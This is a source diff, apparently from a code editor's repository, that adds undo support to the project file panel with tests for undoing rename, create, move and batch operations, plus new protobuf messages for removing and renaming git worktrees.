+ "Initial state before copying a.txt, dir1 and c.txt"
+ );
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.copy(&Default::default(), window, cx);
+ });
+ select_path(&panel, "test/dir2", cx);
+ panel.update_in(cx, |panel, window, cx| {
+ panel.paste(&Default::default(), window, cx);
+ });
+ cx.executor().run_until_parked();
+
+ toggle_expand_dir(&panel, "test/dir2/dir1", cx);
+
+ assert_eq!(
+ visible_entries_as_strings(&panel, 0..20, cx),
+ &[
+ "v test",
+ " v dir1 <== marked",
+ " a.txt <== marked",
+ " b.txt",
+ " v dir2",
+ " v dir1 <== selected",
+ " a.txt",
+ " b.txt",
+ " c.txt",
+ " c.txt <== marked",
+ " d.txt",
+ ],
+ "Should copy dir1 and c.txt into dir2. a.txt is already present in copied dir1."
+ );
+}
+
+#[gpui::test]
+async fn test_undo_rename(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "a.txt": "",
+ "b.txt": "",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ select_path(&panel, "root/a.txt", cx);
+ panel.update_in(cx, |panel, window, cx| panel.rename(&Rename, window, cx));
+ cx.run_until_parked();
+
+ let confirm = panel.update_in(cx, |panel, window, cx| {
+ panel
+ .filename_editor
+ .update(cx, |editor, cx| editor.set_text("renamed.txt", window, cx));
+ panel.confirm_edit(true, window, cx).unwrap()
+ });
+ confirm.await.unwrap();
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/renamed.txt", cx).is_some(),
+ "File should be renamed to renamed.txt"
+ );
+ assert_eq!(
+ find_project_entry(&panel, "root/a.txt", cx),
+ None,
+ "Original file should no longer exist"
+ );
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.undo(&Undo, window, cx);
+ });
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/a.txt", cx).is_some(),
+ "File should be restored to original name after undo"
+ );
+ assert_eq!(
+ find_project_entry(&panel, "root/renamed.txt", cx),
+ None,
+ "Renamed file should no longer exist after undo"
+ );
+}
+
+#[gpui::test]
+async fn test_undo_create_file(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "existing.txt": "",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ select_path(&panel, "root", cx);
+ panel.update_in(cx, |panel, window, cx| panel.new_file(&NewFile, window, cx));
+ cx.run_until_parked();
+
+ let confirm = panel.update_in(cx, |panel, window, cx| {
+ panel
+ .filename_editor
+ .update(cx, |editor, cx| editor.set_text("new.txt", window, cx));
+ panel.confirm_edit(true, window, cx).unwrap()
+ });
+ confirm.await.unwrap();
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/new.txt", cx).is_some(),
+ "New file should exist"
+ );
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.undo(&Undo, window, cx);
+ });
+ cx.run_until_parked();
+
+ assert_eq!(
+ find_project_entry(&panel, "root/new.txt", cx),
+ None,
+ "New file should be removed after undo"
+ );
+ assert!(
+ find_project_entry(&panel, "root/existing.txt", cx).is_some(),
+ "Existing file should still be present"
+ );
+}
+
+#[gpui::test]
+async fn test_undo_create_directory(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "existing.txt": "",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ select_path(&panel, "root", cx);
+ panel.update_in(cx, |panel, window, cx| {
+ panel.new_directory(&NewDirectory, window, cx)
+ });
+ cx.run_until_parked();
+
+ let confirm = panel.update_in(cx, |panel, window, cx| {
+ panel
+ .filename_editor
+ .update(cx, |editor, cx| editor.set_text("new_dir", window, cx));
+ panel.confirm_edit(true, window, cx).unwrap()
+ });
+ confirm.await.unwrap();
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/new_dir", cx).is_some(),
+ "New directory should exist"
+ );
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.undo(&Undo, window, cx);
+ });
+ cx.run_until_parked();
+
+ assert_eq!(
+ find_project_entry(&panel, "root/new_dir", cx),
+ None,
+ "New directory should be removed after undo"
+ );
+}
+
+#[gpui::test]
+async fn test_undo_cut_paste(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "src": {
+ "file.txt": "content",
+ },
+ "dst": {},
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ toggle_expand_dir(&panel, "root/src", cx);
+
+ select_path_with_mark(&panel, "root/src/file.txt", cx);
+ panel.update_in(cx, |panel, window, cx| {
+ panel.cut(&Default::default(), window, cx);
+ });
+
+ select_path(&panel, "root/dst", cx);
+ panel.update_in(cx, |panel, window, cx| {
+ panel.paste(&Default::default(), window, cx);
+ });
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/dst/file.txt", cx).is_some(),
+ "File should be moved to dst"
+ );
+ assert_eq!(
+ find_project_entry(&panel, "root/src/file.txt", cx),
+ None,
+ "File should no longer be in src"
+ );
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.undo(&Undo, window, cx);
+ });
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/src/file.txt", cx).is_some(),
+ "File should be back in src after undo"
+ );
+ assert_eq!(
+ find_project_entry(&panel, "root/dst/file.txt", cx),
+ None,
+ "File should no longer be in dst after undo"
+ );
+}
+
+#[gpui::test]
+async fn test_undo_drag_single_entry(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "src": {
+ "main.rs": "",
+ },
+ "dst": {},
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ toggle_expand_dir(&panel, "root/src", cx);
+
+ panel.update(cx, |panel, _| panel.marked_entries.clear());
+ select_path_with_mark(&panel, "root/src/main.rs", cx);
+ drag_selection_to(&panel, "root/dst", false, cx);
+
+ assert!(
+ find_project_entry(&panel, "root/dst/main.rs", cx).is_some(),
+ "File should be in dst after drag"
+ );
+ assert_eq!(
+ find_project_entry(&panel, "root/src/main.rs", cx),
+ None,
+ "File should no longer be in src after drag"
+ );
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.undo(&Undo, window, cx);
+ });
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/src/main.rs", cx).is_some(),
+ "File should be back in src after undo"
+ );
+ assert_eq!(
+ find_project_entry(&panel, "root/dst/main.rs", cx),
+ None,
+ "File should no longer be in dst after undo"
+ );
+}
+
+#[gpui::test]
+async fn test_undo_drag_multiple_entries(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "src": {
+ "alpha.txt": "",
+ "beta.txt": "",
+ },
+ "dst": {},
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ toggle_expand_dir(&panel, "root/src", cx);
+
+ panel.update(cx, |panel, _| panel.marked_entries.clear());
+ select_path_with_mark(&panel, "root/src/alpha.txt", cx);
+ select_path_with_mark(&panel, "root/src/beta.txt", cx);
+ drag_selection_to(&panel, "root/dst", false, cx);
+
+ assert!(
+ find_project_entry(&panel, "root/dst/alpha.txt", cx).is_some(),
+ "alpha.txt should be in dst after drag"
+ );
+ assert!(
+ find_project_entry(&panel, "root/dst/beta.txt", cx).is_some(),
+ "beta.txt should be in dst after drag"
+ );
+
+ // A single undo should revert the entire batch
+ panel.update_in(cx, |panel, window, cx| {
+ panel.undo(&Undo, window, cx);
+ });
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/src/alpha.txt", cx).is_some(),
+ "alpha.txt should be back in src after undo"
+ );
+ assert!(
+ find_project_entry(&panel, "root/src/beta.txt", cx).is_some(),
+ "beta.txt should be back in src after undo"
+ );
+ assert_eq!(
+ find_project_entry(&panel, "root/dst/alpha.txt", cx),
+ None,
+ "alpha.txt should no longer be in dst after undo"
+ );
+ assert_eq!(
+ find_project_entry(&panel, "root/dst/beta.txt", cx),
+ None,
+ "beta.txt should no longer be in dst after undo"
+ );
+}
+
+#[gpui::test]
+async fn test_multiple_sequential_undos(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "a.txt": "",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ select_path(&panel, "root/a.txt", cx);
+ panel.update_in(cx, |panel, window, cx| panel.rename(&Rename, window, cx));
+ cx.run_until_parked();
+ let confirm = panel.update_in(cx, |panel, window, cx| {
+ panel
+ .filename_editor
+ .update(cx, |editor, cx| editor.set_text("b.txt", window, cx));
+ panel.confirm_edit(true, window, cx).unwrap()
+ });
+ confirm.await.unwrap();
+ cx.run_until_parked();
+
+ assert!(find_project_entry(&panel, "root/b.txt", cx).is_some());
+
+ select_path(&panel, "root", cx);
+ panel.update_in(cx, |panel, window, cx| panel.new_file(&NewFile, window, cx));
+ cx.run_until_parked();
+ let confirm = panel.update_in(cx, |panel, window, cx| {
+ panel
+ .filename_editor
+ .update(cx, |editor, cx| editor.set_text("c.txt", window, cx));
+ panel.confirm_edit(true, window, cx).unwrap()
+ });
+ confirm.await.unwrap();
+ cx.run_until_parked();
+
+ assert!(find_project_entry(&panel, "root/b.txt", cx).is_some());
+ assert!(find_project_entry(&panel, "root/c.txt", cx).is_some());
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.undo(&Undo, window, cx);
+ });
+ cx.run_until_parked();
+
+ assert_eq!(
+ find_project_entry(&panel, "root/c.txt", cx),
+ None,
+ "c.txt should be removed after first undo"
+ );
+ assert!(
+ find_project_entry(&panel, "root/b.txt", cx).is_some(),
+ "b.txt should still exist after first undo"
+ );
+
+ panel.update_in(cx, |panel, window, cx| {
+ panel.undo(&Undo, window, cx);
+ });
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/a.txt", cx).is_some(),
+ "a.txt should be restored after second undo"
+ );
+ assert_eq!(
+ find_project_entry(&panel, "root/b.txt", cx),
+ None,
+ "b.txt should no longer exist after second undo"
+ );
+}
+
+#[gpui::test]
+async fn test_undo_with_empty_stack(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/root",
+ json!({
+ "a.txt": "",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
panel.update_in(cx, |panel, window, cx| {
- panel.paste(&Default::default(), window, cx)
+ panel.undo(&Undo, window, cx);
});
- cx.executor().run_until_parked();
- assert_eq!(
- visible_entries_as_strings(&panel, 0..50, cx),
- &[
- //
- "v root",
- " > a",
- " v b",
- " v a",
- " v inner_dir",
- " four.txt",
- " three.txt",
- " one.txt",
- " two.txt",
- " v c",
- " > a <== selected",
- " > inner_dir",
- " one.txt",
- " two.txt",
- ]
+ cx.run_until_parked();
+
+ assert!(
+ find_project_entry(&panel, "root/a.txt", cx).is_some(),
+ "File tree should be unchanged after undo on empty stack"
);
}
#[gpui::test]
-async fn test_copy_paste_directory_with_sibling_file(cx: &mut gpui::TestAppContext) {
+async fn test_undo_batch(cx: &mut gpui::TestAppContext) {
init_test(cx);
let fs = FakeFs::new(cx.executor());
fs.insert_tree(
- "/test",
+ "/root",
json!({
- "dir1": {
- "a.txt": "",
- "b.txt": "",
- },
- "dir2": {},
- "c.txt": "",
- "d.txt": "",
+ "src": {
+ "main.rs": "// Code!"
+ }
}),
)
.await;
- let project = Project::test(fs.clone(), ["/test".as_ref()], cx).await;
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
let workspace = window
.read_with(cx, |mw, _| mw.workspace().clone())
.unwrap();
let cx = &mut VisualTestContext::from_window(window.into(), cx);
let panel = workspace.update_in(cx, ProjectPanel::new);
+ let worktree_id = project.update(cx, |project, cx| {
+ project.visible_worktrees(cx).next().unwrap().read(cx).id()
+ });
cx.run_until_parked();
- toggle_expand_dir(&panel, "test/dir1", cx);
-
- cx.simulate_modifiers_change(gpui::Modifiers {
- control: true,
- ..Default::default()
+ // Since there currently isn't a way to both create a folder and the file
+ // within it as two separate operations batched under the same
+ // `ProjectPanelOperation::Batch` operation, we'll simply record those
+ // ourselves, knowing that the filesystem already has the folder and file
+ // being provided in the operations.
+ panel.update(cx, |panel, _cx| {
+ panel.undo_manager.record_batch(vec![
+ ProjectPanelOperation::Create {
+ project_path: ProjectPath {
+ worktree_id,
+ path: Arc::from(rel_path("src/main.rs")),
+ },
+ },
+ ProjectPanelOperation::Create {
+ project_path: ProjectPath {
+ worktree_id,
+ path: Arc::from(rel_path("src/")),
+ },
+ },
+ ]);
});
- select_path_with_mark(&panel, "test/dir1", cx);
- select_path_with_mark(&panel, "test/c.txt", cx);
-
+ // Ensure that `src/main.rs` is present in the filesystem before proceeding,
+ // otherwise this test is irrelevant.
+ assert_eq!(fs.files(), vec![PathBuf::from(path!("/root/src/main.rs"))]);
assert_eq!(
- visible_entries_as_strings(&panel, 0..15, cx),
- &[
- "v test",
- " v dir1 <== marked",
- " a.txt",
- " b.txt",
- " > dir2",
- " c.txt <== selected <== marked",
- " d.txt",
- ],
- "Initial state before copying dir1 and c.txt"
+ fs.directories(false),
+ vec![
+ PathBuf::from(path!("/")),
+ PathBuf::from(path!("/root/")),
+ PathBuf::from(path!("/root/src/"))
+ ]
);
panel.update_in(cx, |panel, window, cx| {
- panel.copy(&Default::default(), window, cx);
- });
- select_path(&panel, "test/dir2", cx);
- panel.update_in(cx, |panel, window, cx| {
- panel.paste(&Default::default(), window, cx);
+ panel.undo(&Undo, window, cx);
});
- cx.executor().run_until_parked();
-
- toggle_expand_dir(&panel, "test/dir2/dir1", cx);
+ cx.run_until_parked();
+ assert_eq!(fs.files().len(), 0);
assert_eq!(
- visible_entries_as_strings(&panel, 0..15, cx),
- &[
- "v test",
- " v dir1 <== marked",
- " a.txt",
- " b.txt",
- " v dir2",
- " v dir1 <== selected",
- " a.txt",
- " b.txt",
- " c.txt",
- " c.txt <== marked",
- " d.txt",
- ],
- "Should copy dir1 as well as c.txt into dir2"
+ fs.directories(false),
+ vec![PathBuf::from(path!("/")), PathBuf::from(path!("/root/"))]
);
+}
- // Disambiguating multiple files should not open the rename editor.
- select_path(&panel, "test/dir2", cx);
+#[gpui::test]
+async fn test_paste_external_paths(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+ set_auto_open_settings(
+ cx,
+ ProjectPanelAutoOpenSettings {
+ on_drop: Some(false),
+ ..Default::default()
+ },
+ );
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/root"),
+ json!({
+ "subdir": {}
+ }),
+ )
+ .await;
+
+ fs.insert_tree(
+ path!("/external"),
+ json!({
+ "new_file.rs": "fn main() {}"
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await;
+ let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ cx.write_to_clipboard(ClipboardItem {
+ entries: vec![GpuiClipboardEntry::ExternalPaths(ExternalPaths(
+ smallvec::smallvec![PathBuf::from(path!("/external/new_file.rs"))],
+ ))],
+ });
+
+ select_path(&panel, "root/subdir", cx);
panel.update_in(cx, |panel, window, cx| {
panel.paste(&Default::default(), window, cx);
});
cx.executor().run_until_parked();
assert_eq!(
- visible_entries_as_strings(&panel, 0..15, cx),
+ visible_entries_as_strings(&panel, 0..50, cx),
&[
- "v test",
- " v dir1 <== marked",
- " a.txt",
- " b.txt",
- " v dir2",
- " v dir1",
- " a.txt",
- " b.txt",
- " > dir1 copy <== selected",
- " c.txt",
- " c copy.txt",
- " c.txt <== marked",
- " d.txt",
+ "v root",
+ " v subdir",
+ " new_file.rs <== selected",
],
- "Should copy dir1 as well as c.txt into dir2 and disambiguate them without opening the rename editor"
);
}
#[gpui::test]
-async fn test_copy_paste_nested_and_root_entries(cx: &mut gpui::TestAppContext) {
+async fn test_copy_and_cut_write_to_system_clipboard(cx: &mut gpui::TestAppContext) {
init_test(cx);
let fs = FakeFs::new(cx.executor());
fs.insert_tree(
- "/test",
+ path!("/root"),
json!({
- "dir1": {
- "a.txt": "",
- "b.txt": "",
- },
- "dir2": {},
- "c.txt": "",
- "d.txt": "",
+ "file_a.txt": "",
+ "file_b.txt": ""
}),
)
.await;
- let project = Project::test(fs.clone(), ["/test".as_ref()], cx).await;
+ let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await;
let window = cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
let workspace = window
.read_with(cx, |mw, _| mw.workspace().clone())
@@ -0,0 +1,286 @@
+use anyhow::anyhow;
+use gpui::{AppContext, SharedString, Task, WeakEntity};
+use project::ProjectPath;
+use std::collections::VecDeque;
+use ui::{App, IntoElement, Label, ParentElement, Styled, v_flex};
+use workspace::{
+ Workspace,
+ notifications::{NotificationId, simple_message_notification::MessageNotification},
+};
+
+const MAX_UNDO_OPERATIONS: usize = 10_000;
+
+#[derive(Clone)]
+pub enum ProjectPanelOperation {
+ Batch(Vec<ProjectPanelOperation>),
+ Create {
+ project_path: ProjectPath,
+ },
+ Rename {
+ old_path: ProjectPath,
+ new_path: ProjectPath,
+ },
+}
+
+pub struct UndoManager {
+ workspace: WeakEntity<Workspace>,
+ stack: VecDeque<ProjectPanelOperation>,
+ /// Maximum number of operations to keep on the undo stack.
+ limit: usize,
+}
+
+impl UndoManager {
+ pub fn new(workspace: WeakEntity<Workspace>) -> Self {
+ Self::new_with_limit(workspace, MAX_UNDO_OPERATIONS)
+ }
+
+ pub fn new_with_limit(workspace: WeakEntity<Workspace>, limit: usize) -> Self {
+ Self {
+ workspace,
+ limit,
+ stack: VecDeque::new(),
+ }
+ }
+
+ pub fn can_undo(&self) -> bool {
+ !self.stack.is_empty()
+ }
+
+ pub fn undo(&mut self, cx: &mut App) {
+ if let Some(operation) = self.stack.pop_back() {
+ let task = self.revert_operation(operation, cx);
+ let workspace = self.workspace.clone();
+
+ cx.spawn(async move |cx| {
+ let errors = task.await;
+ if !errors.is_empty() {
+ cx.update(|cx| {
+ let messages = errors
+ .iter()
+ .map(|err| SharedString::from(err.to_string()))
+ .collect();
+
+ Self::show_errors(workspace, messages, cx)
+ })
+ }
+ })
+ .detach();
+ }
+ }
+
+ pub fn record(&mut self, operation: ProjectPanelOperation) {
+ if self.stack.len() >= self.limit {
+ self.stack.pop_front();
+ }
+
+ self.stack.push_back(operation);
+ }
+
+ pub fn record_batch(&mut self, operations: impl IntoIterator<Item = ProjectPanelOperation>) {
+ let mut operations = operations.into_iter().collect::<Vec<_>>();
+ let operation = match operations.len() {
+ 0 => return,
+ 1 => operations.pop().unwrap(),
+ _ => ProjectPanelOperation::Batch(operations),
+ };
+
+ self.record(operation);
+ }
+
+ /// Attempts to revert the provided `operation`, returning a vector of errors
+ /// in case there was any failure while reverting the operation.
+ ///
+ /// For all operations other than [`crate::undo::ProjectPanelOperation::Batch`], a maximum
+ /// of one error is returned.
+ fn revert_operation(
+ &self,
+ operation: ProjectPanelOperation,
+ cx: &mut App,
+ ) -> Task<Vec<anyhow::Error>> {
+ match operation {
+ ProjectPanelOperation::Create { project_path } => {
+ let Some(workspace) = self.workspace.upgrade() else {
+ return Task::ready(vec![anyhow!("Failed to obtain workspace.")]);
+ };
+
+ let result = workspace.update(cx, |workspace, cx| {
+ workspace.project().update(cx, |project, cx| {
+ let entry_id = project
+ .entry_for_path(&project_path, cx)
+ .map(|entry| entry.id)
+ .ok_or_else(|| anyhow!("No entry for path."))?;
+
+ project
+ .delete_entry(entry_id, true, cx)
+ .ok_or_else(|| anyhow!("Failed to trash entry."))
+ })
+ });
+
+ let task = match result {
+ Ok(task) => task,
+ Err(err) => return Task::ready(vec![err]),
+ };
+
+ cx.spawn(async move |_| match task.await {
+ Ok(_) => vec![],
+ Err(err) => vec![err],
+ })
+ }
+ ProjectPanelOperation::Rename { old_path, new_path } => {
+ let Some(workspace) = self.workspace.upgrade() else {
+ return Task::ready(vec![anyhow!("Failed to obtain workspace.")]);
+ };
+
+ let result = workspace.update(cx, |workspace, cx| {
+ workspace.project().update(cx, |project, cx| {
+ let entry_id = project
+ .entry_for_path(&new_path, cx)
+ .map(|entry| entry.id)
+ .ok_or_else(|| anyhow!("No entry for path."))?;
+
+ Ok(project.rename_entry(entry_id, old_path.clone(), cx))
+ })
+ });
+
+ let task = match result {
+ Ok(task) => task,
+ Err(err) => return Task::ready(vec![err]),
+ };
+
+ cx.spawn(async move |_| match task.await {
+ Ok(_) => vec![],
+ Err(err) => vec![err],
+ })
+ }
+ ProjectPanelOperation::Batch(operations) => {
+ // When reverting operations in a batch, we reverse the order of
+ // operations to handle dependencies between them. For example,
+ // if a batch contains the following order of operations:
+ //
+ // 1. Create `src/`
+ // 2. Create `src/main.rs`
+ //
+ // If we first try to revert the directory creation, it would
+ // fail because there's still files inside the directory.
+ // Operations are also reverted sequentially in order to avoid
+ // this same problem.
+ let tasks: Vec<_> = operations
+ .into_iter()
+ .rev()
+ .map(|operation| self.revert_operation(operation, cx))
+ .collect();
+
+ cx.spawn(async move |_| {
+ let mut errors = Vec::new();
+ for task in tasks {
+ errors.extend(task.await);
+ }
+ errors
+ })
+ }
+ }
+ }
+
+ /// Displays a notification with the list of provided errors ensuring that,
+ /// when more than one error is provided, which can be the case when dealing
+ /// with undoing a [`crate::undo::ProjectPanelOperation::Batch`], a list is
+ /// displayed with each of the errors, instead of a single message.
+ fn show_errors(workspace: WeakEntity<Workspace>, messages: Vec<SharedString>, cx: &mut App) {
+ workspace
+ .update(cx, move |workspace, cx| {
+ let notification_id =
+ NotificationId::Named(SharedString::new_static("project_panel_undo"));
+
+ workspace.show_notification(notification_id, cx, move |cx| {
+ cx.new(|cx| {
+ if let [err] = messages.as_slice() {
+ MessageNotification::new(err.to_string(), cx)
+ .with_title("Failed to undo Project Panel Operation")
+ } else {
+ MessageNotification::new_from_builder(cx, move |_, _| {
+ v_flex()
+ .gap_1()
+ .children(
+ messages
+ .iter()
+ .map(|message| Label::new(format!("- {message}"))),
+ )
+ .into_any_element()
+ })
+ .with_title("Failed to undo Project Panel Operations")
+ }
+ })
+ })
+ })
+ .ok();
+ }
+}
+
+#[cfg(test)]
+mod test {
+ use crate::{
+ ProjectPanel, project_panel_tests,
+ undo::{ProjectPanelOperation, UndoManager},
+ };
+ use gpui::{Entity, TestAppContext, VisualTestContext};
+ use project::{FakeFs, Project, ProjectPath};
+ use std::sync::Arc;
+ use util::rel_path::rel_path;
+ use workspace::MultiWorkspace;
+
+ struct TestContext {
+ project: Entity<Project>,
+ panel: Entity<ProjectPanel>,
+ }
+
+ async fn init_test(cx: &mut TestAppContext) -> TestContext {
+ project_panel_tests::init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ let project = Project::test(fs.clone(), ["/root".as_ref()], cx).await;
+ let window =
+ cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx));
+ let workspace = window
+ .read_with(cx, |mw, _| mw.workspace().clone())
+ .unwrap();
+ let cx = &mut VisualTestContext::from_window(window.into(), cx);
+ let panel = workspace.update_in(cx, ProjectPanel::new);
+ cx.run_until_parked();
+
+ TestContext { project, panel }
+ }
+
+ #[gpui::test]
+ async fn test_limit(cx: &mut TestAppContext) {
+ let test_context = init_test(cx).await;
+ let worktree_id = test_context.project.update(cx, |project, cx| {
+ project.visible_worktrees(cx).next().unwrap().read(cx).id()
+ });
+
+ let build_create_operation = |file_name: &str| ProjectPanelOperation::Create {
+ project_path: ProjectPath {
+ path: Arc::from(rel_path(file_name)),
+ worktree_id,
+ },
+ };
+
+ // Since we're updating the `ProjectPanel`'s undo manager with one whose
+ // limit is 3 operations, we only need to create 4 operations which
+ // we'll record, in order to confirm that the oldest operation is
+ // evicted.
+ let operation_a = build_create_operation("file_a.txt");
+ let operation_b = build_create_operation("file_b.txt");
+ let operation_c = build_create_operation("file_c.txt");
+ let operation_d = build_create_operation("file_d.txt");
+
+ test_context.panel.update(cx, move |panel, _cx| {
+ panel.undo_manager = UndoManager::new_with_limit(panel.workspace.clone(), 3);
+ panel.undo_manager.record(operation_a);
+ panel.undo_manager.record(operation_b);
+ panel.undo_manager.record(operation_c);
+ panel.undo_manager.record(operation_d);
+
+ assert_eq!(panel.undo_manager.stack.len(), 3);
+ });
+ }
+}
@@ -222,7 +222,7 @@ message ExternalExtensionAgentsUpdated {
message ExternalAgentLoadingStatusUpdated {
uint64 project_id = 1;
string name = 2;
- string status = 3;
+ reserved 3;
}
message NewExternalAgentVersionAvailable {
@@ -126,6 +126,7 @@ message UpdateRepository {
optional string remote_upstream_url = 14;
optional string remote_origin_url = 15;
optional string original_repo_abs_path = 16;
+ repeated Worktree linked_worktrees = 17;
}
message RemoveRepository {
@@ -209,6 +210,7 @@ message GitDeleteBranch {
uint64 project_id = 1;
uint64 repository_id = 2;
string branch_name = 3;
+ bool is_remote = 4;
}
message GitDiff {
@@ -583,6 +585,20 @@ message GitCreateWorktree {
optional string commit = 5;
}
+message GitRemoveWorktree {
+ uint64 project_id = 1;
+ uint64 repository_id = 2;
+ string path = 3;
+ bool force = 4;
+}
+
+message GitRenameWorktree {
+ uint64 project_id = 1;
+ uint64 repository_id = 2;
+ string old_path = 3;
+ string new_path = 4;
+}
+
message RunGitHook {
enum GitHook {
PRE_COMMIT = 0;
@@ -230,6 +230,7 @@ message ApplyCompletionAdditionalEdits {
uint64 project_id = 1;
uint64 buffer_id = 2;
Completion completion = 3;
+ repeated AnchorRange all_commit_ranges = 4;
}
message ApplyCompletionAdditionalEditsResponse {
@@ -474,7 +474,9 @@ message Envelope {
SpawnKernel spawn_kernel = 426;
SpawnKernelResponse spawn_kernel_response = 427;
- KillKernel kill_kernel = 428; // current max
+ KillKernel kill_kernel = 428;
+ GitRemoveWorktree git_remove_worktree = 431;
+ GitRenameWorktree git_rename_worktree = 432; // current max
}
reserved 87 to 88;
@@ -354,6 +354,8 @@ messages!(
(GitGetWorktrees, Background),
(GitWorktreesResponse, Background),
(GitCreateWorktree, Background),
+ (GitRemoveWorktree, Background),
+ (GitRenameWorktree, Background),
(ShareAgentThread, Foreground),
(GetSharedAgentThread, Foreground),
